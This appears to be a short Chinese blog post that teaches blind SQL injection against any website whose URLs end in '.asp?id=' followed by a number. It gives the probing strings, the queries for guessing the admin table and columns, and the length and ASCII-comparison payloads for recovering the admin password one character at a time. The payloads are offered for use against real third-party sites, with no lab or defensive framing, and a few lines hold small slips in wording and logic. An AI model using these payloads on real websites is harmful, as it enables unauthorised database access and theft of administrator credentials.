本文介绍了一种通过SQL注入攻击来探测网站漏洞的方法。主要包括:如何判断网站是否存在注入点,如何猜测数据库表名及字段内容等关键步骤。
对象:.asp?id=12(任意数字) 结尾网站
1.判断是否存在注入点:分别依次在链接末尾加【’】【and 1=1】【and 1=2】并回车,如果只有第二次能正常显示网页,说明可以注入。
2.猜解表名:链接尾【and exists(select admin from admin)】若正常显示,说明存在admin列;
同理,把第一个admin改成password则可以查询列password是否存在。
3.猜字段内容: 链接尾加【and (select top 1 len (admin) from admin)>1】,
若页面正常显示,则依次加1(>2变成>1),直到页面不能正常显示,该数字为字段长度;
链接尾加 【and (select top 1 asc(mid(admin,1,1)) from admin)>97】,
若第一位字符为a(ASCII码值为97),则不会正常显示页面,由此依次得出每个字符。此处可用折半加快速度。
将以上两组中的第一个admin改为password则可以得到password的字段。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
